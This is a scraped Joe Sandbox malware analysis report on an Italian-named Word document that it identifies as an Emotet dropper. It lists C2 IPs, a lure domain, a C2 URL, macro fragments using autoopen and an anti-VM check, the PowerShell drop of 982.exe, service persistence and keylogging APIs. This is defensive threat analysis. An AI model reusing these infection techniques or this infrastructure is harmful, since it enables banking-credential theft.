Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Nuovo_documento_2019.09.20.doc

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:961422
Start date:20.09.2019
Start time:13:28:47
Joe Sandbox Product:Cloud
Overall analysis duration:0h 9m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Nuovo_documento_2019.09.20.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.evad.winDOC@18/52@1/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 90.5% (good quality ratio 87.9%)
  • Quality average: 82.2%
  • Quality standard deviation: 25.6%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 133
  • Number of non-executed functions: 301
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Windows Management Instrumentation1Valid Accounts1Valid Accounts1Software Packing2Input Capture11System Time Discovery1Remote File Copy2Input Capture11Data Encrypted12Uncommonly Used Port1
Replication Through Removable MediaPowerShell2Modify Existing Service11Access Token Manipulation1Disabling Security Tools1Network SniffingSecurity Software Discovery13Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy2
Drive-by CompromiseScripting12New Service12Process Injection3Deobfuscate/Decode Files or Information11Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22
Exploit Public-Facing ApplicationExecution through API1System FirmwareNew Service12Scripting12Credentials in FilesFile and Directory Discovery11Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol2
Spearphishing LinkExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationSystem Information Discovery45Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol2
Spearphishing AttachmentCommand-Line Interface11Modify Existing ServiceNew ServiceMasquerading2Brute ForceQuery Registry1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceService Execution2Path InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port
Supply Chain CompromiseThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer Protocol
Trusted RelationshipRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection3Input PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer Encryption

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for sampleShow sources
Source: Nuovo_documento_2019.09.20.docJoe Sandbox ML: detected
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\982.exeVirustotal: Detection: 15%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Nuovo_documento_2019.09.20.docVirustotal: Detection: 22%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,7_2_0040207B
Source: C:\Users\user\982.exeCode function: 7_2_00401F56 CryptGetHashParam,7_2_00401F56
Source: C:\Users\user\982.exeCode function: 7_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,7_2_0040215A
Source: C:\Users\user\982.exeCode function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,7_2_00401F75
Source: C:\Users\user\982.exeCode function: 7_2_00401F11 CryptExportKey,7_2_00401F11
Source: C:\Users\user\982.exeCode function: 7_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,12_2_00401F75
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,12_2_0040207B
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F56 CryptGetHashParam,12_2_00401F56
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,12_2_0040215A
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F11 CryptExportKey,12_2_00401F11
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00401F75 CryptDecodeObjectEx,LocalFree,12_1_00401F75

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: sabiosdelamor.co
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49164 -> 149.167.86.174:990
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 149.167.86.174 149.167.86.174
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401383 InternetReadFile,12_2_00401383
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: sabiosdelamor.co
Urls found in memory or binary dataShow sources
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmpString found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmpString found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/n
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00403930 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,4_2_00403930

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F5047_2_0040F504
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040F50412_2_0040F504

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\982.exeCode function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,7_2_00401F75
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,12_2_00401F75

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing and Enable Content. Type: Microsoft Word Document
Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)Show sources
Source: Nuovo_documento_2019.09.20.docOLE, VBA macro line: If RecentFiles.Count > 3 Then
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00522670 NtResumeThread,4_2_00522670
Source: C:\Users\user\982.exeCode function: 4_2_00522630 NtWriteVirtualMemory,4_2_00522630
Source: C:\Users\user\982.exeCode function: 4_2_005226D0 NtMapViewOfSection,4_2_005226D0
Source: C:\Users\user\982.exeCode function: 4_2_005226B0 NtCreateSection,4_2_005226B0
Source: C:\Users\user\982.exeCode function: 6_2_00492670 NtResumeThread,6_2_00492670
Source: C:\Users\user\982.exeCode function: 6_2_00492630 NtWriteVirtualMemory,6_2_00492630
Source: C:\Users\user\982.exeCode function: 6_2_004926D0 NtMapViewOfSection,6_2_004926D0
Source: C:\Users\user\982.exeCode function: 6_2_004926B0 NtCreateSection,6_2_004926B0
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2670 NtResumeThread,9_2_005A2670
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2630 NtWriteVirtualMemory,9_2_005A2630
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A26D0 NtMapViewOfSection,9_2_005A26D0
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A26B0 NtCreateSection,9_2_005A26B0
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2670 NtResumeThread,11_2_005B2670
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2630 NtWriteVirtualMemory,11_2_005B2630
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B26D0 NtMapViewOfSection,11_2_005B26D0
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B26B0 NtCreateSection,11_2_005B26B0
Contains functionality to delete servicesShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F6D0 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,7_2_0040F6D0
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\982.exeCode function: 7_2_00401D2B CreateProcessAsUserW,CreateProcessW,7_2_00401D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.datJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\sortedwatched.exeMutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\982.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\982.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Source: C:\Windows\System32\sortedwatched.exeMutant created: \BaseNamedObjects\Global\M3C4E0000
Detected potential crypto functionShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0042A1274_2_0042A127
Source: C:\Users\user\982.exeCode function: 4_2_0041032F4_2_0041032F
Source: C:\Users\user\982.exeCode function: 4_2_004294724_2_00429472
Source: C:\Users\user\982.exeCode function: 4_2_0042A5474_2_0042A547
Source: C:\Users\user\982.exeCode function: 4_2_004355314_2_00435531
Source: C:\Users\user\982.exeCode function: 4_2_004376A14_2_004376A1
Source: C:\Users\user\982.exeCode function: 4_2_004366B14_2_004366B1
Source: C:\Users\user\982.exeCode function: 4_2_004299474_2_00429947
Source: C:\Users\user\982.exeCode function: 4_2_00435A754_2_00435A75
Source: C:\Users\user\982.exeCode function: 4_2_00412AE34_2_00412AE3
Source: C:\Users\user\982.exeCode function: 4_2_00429D1B4_2_00429D1B
Source: C:\Users\user\982.exeCode function: 4_2_0042EFFF4_2_0042EFFF
Source: C:\Users\user\982.exeCode function: 4_2_00435FB94_2_00435FB9
Source: C:\Users\user\982.exeCode function: 4_2_002C50E84_2_002C50E8
Source: C:\Users\user\982.exeCode function: 4_2_002C50E44_2_002C50E4
Source: C:\Users\user\982.exeCode function: 4_2_002C22AF4_2_002C22AF
Source: C:\Users\user\982.exeCode function: 4_2_002C48C14_2_002C48C1
Source: C:\Users\user\982.exeCode function: 4_2_005229704_2_00522970
Source: C:\Users\user\982.exeCode function: 5_2_00404AD45_2_00404AD4
Source: C:\Users\user\982.exeCode function: 5_2_0040436D5_2_0040436D
Source: C:\Users\user\982.exeCode function: 5_2_00402F825_2_00402F82
Source: C:\Users\user\982.exeCode function: 5_2_004037A95_2_004037A9
Source: C:\Users\user\982.exeCode function: 6_2_003E22AF6_2_003E22AF
Source: C:\Users\user\982.exeCode function: 6_2_003E50E86_2_003E50E8
Source: C:\Users\user\982.exeCode function: 6_2_003E50E46_2_003E50E4
Source: C:\Users\user\982.exeCode function: 6_2_003E48C16_2_003E48C1
Source: C:\Users\user\982.exeCode function: 6_2_004929706_2_00492970
Source: C:\Users\user\982.exeCode function: 7_2_00404AD47_2_00404AD4
Source: C:\Users\user\982.exeCode function: 7_2_0040436D7_2_0040436D
Source: C:\Users\user\982.exeCode function: 7_2_00402F827_2_00402F82
Source: C:\Users\user\982.exeCode function: 7_2_004037A97_2_004037A9
Source: C:\Users\user\982.exeCode function: 7_1_00404AD47_1_00404AD4
Source: C:\Users\user\982.exeCode function: 7_1_0040436D7_1_0040436D
Source: C:\Users\user\982.exeCode function: 7_1_00402F827_1_00402F82
Source: C:\Users\user\982.exeCode function: 7_1_004037A97_1_004037A9
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E22AF9_2_003E22AF
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E50E89_2_003E50E8
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E50E49_2_003E50E4
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E48C19_2_003E48C1
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A29709_2_005A2970
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F48C111_2_004F48C1
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F50E811_2_004F50E8
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F50E411_2_004F50E4
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F22AF11_2_004F22AF
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B297011_2_005B2970
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00404AD412_2_00404AD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040436D12_2_0040436D
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00402F8212_2_00402F82
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_004037A912_2_004037A9
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00404AD412_1_00404AD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_0040436D12_1_0040436D
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00402F8212_1_00402F82
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_004037A912_1_004037A9
Document contains an ObjectPool stream indicating possible embedded files or OLE objectsShow sources
Source: Nuovo_documento_2019.09.20.docOLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Nuovo_documento_2019.09.20.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module JIodCjfv, Function autoopenName: autoopen
Document contains embedded VBA macrosShow sources
Source: Nuovo_documento_2019.09.20.docOLE indicator, VBA macros: true
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\982.exe 8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\982.exeCode function: String function: 0042922B appears 129 times
Source: C:\Users\user\982.exeCode function: String function: 00429338 appears 52 times
PE file contains strange resourcesShow sources
Source: 982.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\sortedwatched.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\sortedwatched.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Yara signature matchShow sources
Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.evad.winDOC@18/52@1/3
Contains functionality to create servicesShow sources
Source: C:\Users\user\982.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0
Source: C:\Users\user\982.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,7_1_0040F7A0
Source: C:\Windows\System32\sortedwatched.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,12_2_0040F7A0
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\982.exeCode function: 5_2_00401943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00401943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0041286F __EH_prolog3_GS,_memset,GetVersionExW,_malloc,_memset,_DebugHeapAllocator,_wcschr,CoInitializeEx,CoCreateInstance,4_2_0041286F
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\982.exeCode function: 4_2_004190A2 LoadResource,LockResource,_malloc,GetSysColor,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,FreeResource,4_2_004190A2
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ovo_documento_2019.09.20.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR81DD.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
